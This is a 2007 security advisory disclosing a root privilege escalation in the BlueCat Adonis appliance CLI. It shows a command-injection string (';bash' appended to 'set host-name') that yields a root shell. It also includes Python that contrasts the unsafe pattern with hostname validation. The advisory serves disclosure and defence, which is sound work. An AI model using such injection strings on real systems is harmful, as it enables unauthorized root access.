Template Security Security Advisory
BlueCat Networks Adonis CLI root privilege escalation
Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0
Contents
Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History
Summary
Template Security has discovered a root privilege escalation vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance which allows the admin user to gain root privilege from the Command Line Interface (CLI).
Software Version
Adonis version 5.0.2.8 was tested.
Details
The admin account on the Adonis DNS/DHCP appliance provides access to a CLI that allows an administrator to perform tasks such as setting the IP address, netmask, system time and system hostname. By entering a certain command sequence, the administrator is able to execute a command as root.
Impact
Access to the admin account is the same as root access on the appliance.
Exploit
Here we use the 'set host-name' CLI command to execute a root shell:
:adonis>set host-name ;bash
adonis.katter.org
root@adonis:~# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: There may be other command sequences that accomplish the same result.
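The advisory does not describe how the CLI is implemented; the transcript above is consistent with the host-name argument reaching a shell unquoted. As an added example (not from the advisory and not the vendor's code), the Python below puts that pattern next to an allow-list check that accepts only RFC 1123 host names, which is why it also covers the other command sequences the note mentions. HOSTNAME_BIN and all function names are assumptions made for illustration.

```python
import re
import shlex

# One DNS label per RFC 952/1123: letters, digits, hyphens; no leading or
# trailing hyphen; at most 63 characters.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")

HOSTNAME_BIN = "/bin/hostname"  # assumed path of the system utility


def validate_hostname(value):
    """Return value unchanged if it is a well-formed host name, else raise ValueError."""
    if not 1 <= len(value) <= 253:
        raise ValueError("host name must be 1 to 253 characters")
    for label in value.split("."):
        if not _LABEL.fullmatch(label):
            raise ValueError("invalid label in host name: %r" % label)
    return value


def shell_view(command_line):
    """Tokenise a command line roughly as a shell would, splitting out ; | & < > ( )."""
    return list(shlex.shlex(command_line, posix=True, punctuation_chars=True))


def unsafe_command_line(value):
    """Anti-pattern: operator input pasted into a string that a shell will parse."""
    return "%s %s" % (HOSTNAME_BIN, value)


def safe_argv(value):
    """Validated input as a single argv element, for subprocess.run(argv) with no shell."""
    return [HOSTNAME_BIN, validate_hostname(value)]


if __name__ == "__main__":
    typed = ";bash"  # the argument from the advisory's transcript
    # The shell sees a command separator followed by a second command.
    print(shell_view(unsafe_command_line(typed)))
    try:
        safe_argv(typed)
    except ValueError as exc:
        print("rejected:", exc)
    # A legitimate name (the one shown in the transcript) passes unchanged.
    print(safe_argv("adonis.katter.org"))
```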
Workarounds
Only provide admin account access to administrators who also have root account access on the appliance.
Obtaining Patched Software
Contact the vendor.
Credits
forloop discovered this vulnerability while enjoying a Tuborg Gold. forloop is a member of Template Security.
Revision History
2007-08-16: Revision 0 released